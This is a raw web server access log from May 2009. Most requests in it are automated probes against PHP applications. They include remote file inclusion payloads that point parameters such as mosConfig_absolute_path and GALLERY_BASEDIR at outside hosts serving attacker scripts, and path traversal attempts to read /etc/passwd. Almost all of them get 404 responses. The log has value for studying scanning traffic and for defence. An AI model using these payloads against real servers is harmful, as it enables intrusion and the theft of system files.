58.227.193.198 - - [17/May/2009:01:17:24 -0400] "GET /logs/error_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:01:17:27 -0400] "GET /logs/access_log.Q108100600%20%20//index.php?sayfa=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.90.20.125 - - [17/May/2009:01:17:38 -0400] "GET /logs/access_log.Q109022600//components/com_flyspray/startdown.php?file=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
122.116.178.20 - - [17/May/2009:01:17:41 -0400] "GET /logs/access_log.Q108090200//e404.php?DOCUMENT_ROOT=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.116.178.20 - - [17/May/2009:01:17:41 -0400] "GET /logs/access_log.Q108100700//e404.php?DOCUMENT_ROOT=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.116.178.20 - - [17/May/2009:01:18:00 -0400] "GET /logs/access_log.Q109010300%20%20//e404.php?DOCUMENT_ROOT=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.116.178.20 - - [17/May/2009:01:18:15 -0400] "GET /logs/access_log.Q109032800%20%20//e404.php?DOCUMENT_ROOT=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.184.52.3 - - [17/May/2009:01:18:31 -0400] "GET /logs/access_log.Q108112400/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
80.90.20.125 - - [17/May/2009:01:18:39 -0400] "GET /logs/access_log.Q109022600//components/com_flyspray/startdown.php?file=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
122.153.212.195 - - [17/May/2009:01:18:42 -0400] "GET /logs//plugin.class.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:01:18:42 -0400] "GET /logs/access_log.Q108100600//plugin.class.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:01:18:42 -0400] "GET //plugin.class.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
91.184.52.3 - - [17/May/2009:01:19:06 -0400] "GET /logs/error_log.Q108100300/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
216.129.119.17 - - [17/May/2009:01:19:31 -0400] "GET /logs/access_log.Q109050700 HTTP/1.0" 200 301885 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
122.153.212.195 - - [17/May/2009:01:19:46 -0400] "GET /logs/access_log.Q108090100//plugin.class.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:20:44 -0400] "GET /logs/skin/zero_vote/error.php?dir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:20:44 -0400] "GET /skin/zero_vote/error.php?dir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
122.116.178.20 - - [17/May/2009:01:20:44 -0400] "GET /logs/access_log.Q108090200//e404.php?DOCUMENT_ROOT=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:20:44 -0400] "GET /logs/access_log.Q108112400/skin/zero_vote/error.php?dir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
122.116.178.20 - - [17/May/2009:01:20:45 -0400] "GET /logs/access_log.Q108100700//e404.php?DOCUMENT_ROOT=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:01:20:53 -0400] "GET /logs/access_log.Q109022600%20%20//index.php?sayfa=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:01:21:03 -0400] "GET /logs/access_log.Q109022600%20%20//index.php?sayfa=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:01:21:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.148.6.84 - - [17/May/2009:01:22:11 -0400] "GET /logs/access_log.Q108111500/components/com_flyspray/startdown.php?file=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 262 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
213.148.6.84 - - [17/May/2009:01:22:11 -0400] "GET /components/com_flyspray/startdown.php?file=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
213.148.6.84 - - [17/May/2009:01:22:29 -0400] "GET /logs/access_log.Q108111500/components/com_flyspray/startdown.php?file=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.825"
213.148.6.84 - - [17/May/2009:01:22:30 -0400] "GET /components/com_flyspray/startdown.php?file=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
213.148.6.84 - - [17/May/2009:01:22:30 -0400] "GET /logs/components/com_flyspray/startdown.php?file=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.825"
213.148.6.84 - - [17/May/2009:01:23:08 -0400] "GET /components/com_flyspray/startdown.php?file=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
77.221.130.2 - - [17/May/2009:01:23:15 -0400] "GET /logs/access_log.Q109013000//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:01:23:15 -0400] "GET //upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:01:23:15 -0400] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
221.139.104.104 - - [17/May/2009:01:23:16 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
122.153.212.195 - - [17/May/2009:01:23:16 -0400] "GET /logs/access_log.Q108100600%20%20//plugin.class.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
77.221.130.2 - - [17/May/2009:01:23:35 -0400] "GET /logs/error_log.Q108032900//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
66.249.72.114 - - [17/May/2009:01:23:43 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
122.153.212.195 - - [17/May/2009:01:23:44 -0400] "GET /logs/access_log.Q108090100%20%20//plugin.class.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:01:23:49 -0400] "GET /logs/access_log.Q108072200/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.15.206.26 - - [17/May/2009:01:23:53 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.15.206.26 - - [17/May/2009:01:23:53 -0400] "GET /logs/access_log.Q108082000//newspublish/include.php?path%5Bdocroot%5D=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.15.206.26 - - [17/May/2009:01:23:53 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
67.15.206.26 - - [17/May/2009:01:23:53 -0400] "GET /logs/access_log.Q108122500//newspublish/include.php?path%5Bdocroot%5D=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.225.211.159 - - [17/May/2009:01:23:57 -0400] "GET /logs/access_log.Q109013000//upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:01:23:57 -0400] "GET //upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 216 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:01:23:57 -0400] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 221 "-" "libwww-perl/5.820"
193.221.119.126 - - [17/May/2009:01:24:06 -0400] "GET /logs/access_log.Q109022600//index.php?sayfa=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.225.211.159 - - [17/May/2009:01:24:09 -0400] "GET /logs/error_log.Q108032900//upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:01:24:11 -0400] "GET /logs/access_log.Q109013000//upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:01:24:11 -0400] "GET //upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 216 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:01:24:11 -0400] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 221 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:01:24:21 -0400] "GET /logs/error_log.Q108032900//upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.820"
213.148.6.84 - - [17/May/2009:01:24:22 -0400] "GET /logs/access_log.Q109022600/components/com_flyspray/startdown.php?file=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 262 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
88.191.103.144 - - [17/May/2009:01:24:33 -0400] "GET /logs/access_log.Q109022600//index.php?sayfa=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.72.114 - - [17/May/2009:01:24:56 -0400] "GET /logs/error_log.Q107121100 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.15.206.26 - - [17/May/2009:01:25:07 -0400] "GET /logs/access_log.Q108082000%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.15.206.26 - - [17/May/2009:01:25:07 -0400] "GET /logs/access_log.Q108122500%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.148.6.84 - - [17/May/2009:01:25:28 -0400] "GET /logs/access_log.Q109022600/components/com_flyspray/startdown.php?file=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.825"
72.30.79.49 - - [17/May/2009:01:25:31 -0400] "GET /logs/access_log.Q108012300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [17/May/2009:01:25:49 -0400] "GET /logs/error_log.Q107120300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.130.2 - - [17/May/2009:01:25:54 -0400] "GET /logs/error_log.Q108082500%20//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
211.241.40.51 - - [17/May/2009:01:26:18 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:01:26:18 -0400] "GET /logs/access_log.Q108082000%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:01:26:18 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.199.230.101 - - [17/May/2009:01:26:23 -0400] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
195.199.230.101 - - [17/May/2009:01:26:23 -0400] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
89.111.189.11 - - [17/May/2009:01:26:31 -0400] "GET /logs//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:26:31 -0400] "GET /logs/access_log.Q108060800%20%20//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:26:33 -0400] "GET //install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:26:33 -0400] "GET /logs/access_log.Q109021100%20%20//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:26:36 -0400] "GET /logs//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:26:36 -0400] "GET /logs/access_log.Q108060800//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:26:37 -0400] "GET //install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:26:38 -0400] "GET /logs/access_log.Q109021100//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:01:26:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [17/May/2009:01:26:53 -0400] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.34.78.110 - - [17/May/2009:01:26:53 -0400] "GET //upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:01:27:16 -0400] "GET /logs/access_log.Q109050800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.52.164.18 - - [17/May/2009:01:27:31 -0400] "GET /logs/access_log.Q108101100%20//include/admin.lib.inc.php?site_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.811"
211.241.40.51 - - [17/May/2009:01:27:31 -0400] "GET /logs/access_log.Q108072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:01:27:44 -0400] "GET /logs/access_log.Q108092700//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.52.164.18 - - [17/May/2009:01:27:51 -0400] "GET /logs/access_log.Q108092100%20//include/admin.lib.inc.php?site_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.811"
66.225.211.159 - - [17/May/2009:01:27:54 -0400] "GET /logs/error_log.Q108082500%20//upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:01:28:08 -0400] "GET /logs/error_log.Q108082500%20//upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.820"
222.236.44.32 - - [17/May/2009:01:28:32 -0400] "GET //upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:01:28:32 -0400] "GET /logs/error_log.Q108082500//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:01:28:32 -0400] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:01:28:48 -0400] "GET /logs/error_log.Q108082500//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
222.236.44.32 - - [17/May/2009:01:28:48 -0400] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
193.221.119.126 - - [17/May/2009:01:28:48 -0400] "GET /logs/access_log.Q108090200//s_loadenv.inc.php?DOCUMENT_ROOT=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.236.44.32 - - [17/May/2009:01:28:48 -0400] "GET //upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
190.228.29.17 - - [17/May/2009:01:30:18 -0400] "GET /logs/errors.php?error=http://www.rubyroo.com/modules/test.txt?? HTTP/1.1" 404 213 "-" "Advanced Browser (http://www.avantbrowser.com)"
190.228.29.17 - - [17/May/2009:01:30:18 -0400] "GET /errors.php?error=http://www.rubyroo.com/modules/test.txt?? HTTP/1.1" 404 208 "-" "Advanced Browser (http://www.avantbrowser.com)"
110.45.144.106 - - [17/May/2009:01:30:33 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:01:30:33 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:01:30:33 -0400] "GET /logs/access_log.Q108061500/includes/ktedit/toolbar.php?dirDepth=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:01:30:47 -0400] "GET /logs/access_log.Q108072000/includes/ktedit/toolbar.php?dirDepth=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.69.42.2 - - [17/May/2009:01:31:27 -0400] "GET /logs/access_log.Q108090400/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
67.69.42.2 - - [17/May/2009:01:31:28 -0400] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
67.69.42.2 - - [17/May/2009:01:31:28 -0400] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
211.241.40.51 - - [17/May/2009:01:31:40 -0400] "GET /logs/access_log.Q108071500%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:01:31:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.241.40.51 - - [17/May/2009:01:32:35 -0400] "GET /logs/access_log.Q108092700%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.236.44.32 - - [17/May/2009:01:32:43 -0400] "GET /logs/error_log.Q108032900//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
222.239.76.25 - - [17/May/2009:01:32:47 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:01:32:47 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:01:32:47 -0400] "GET /logs/access_log.Q108061400//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
221.157.225.65 - - [17/May/2009:01:32:58 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
221.157.225.65 - - [17/May/2009:01:32:58 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
221.157.225.65 - - [17/May/2009:01:32:58 -0400] "GET /logs/access_log.Q108061400//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.236.44.32 - - [17/May/2009:01:32:58 -0400] "GET /logs/error_log.Q108032900//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
222.239.76.25 - - [17/May/2009:01:32:58 -0400] "GET /logs/access_log.Q108081700//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
221.157.225.65 - - [17/May/2009:01:33:07 -0400] "GET /logs/access_log.Q108081700//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:33:21 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:33:21 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:33:21 -0400] "GET /logs/access_log.Q108061400//components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
208.80.195.120 - - [17/May/2009:01:33:38 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Creative; SV1; .NET CLR 1.0.3705)"
110.45.144.106 - - [17/May/2009:01:33:56 -0400] "GET /logs/access_log.Q108061500%20%20/includes/ktedit/toolbar.php?dirDepth=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:33:59 -0400] "GET /logs/access_log.Q108081700//components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:01:34:22 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:01:34:22 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:01:34:22 -0400] "GET /logs/access_log.Q108100700//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:01:34:41 -0400] "GET /logs/access_log.Q108120600//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
72.75.137.247 - - [17/May/2009:01:34:41 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.75.137.247 - - [17/May/2009:01:34:41 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.30.79.49 - - [17/May/2009:01:34:43 -0400] "GET /logs/ HTTP/1.0" 200 1686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.75.137.247 - - [17/May/2009:01:34:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.75.137.247 - - [17/May/2009:01:34:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
221.157.225.65 - - [17/May/2009:01:35:14 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
221.157.225.65 - - [17/May/2009:01:35:14 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
221.157.225.65 - - [17/May/2009:01:35:14 -0400] "GET /logs/access_log.Q108100700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.236.44.32 - - [17/May/2009:01:35:14 -0400] "GET /logs/error_log.Q108082500%20//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
221.157.225.65 - - [17/May/2009:01:35:24 -0400] "GET /logs/access_log.Q108061400%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
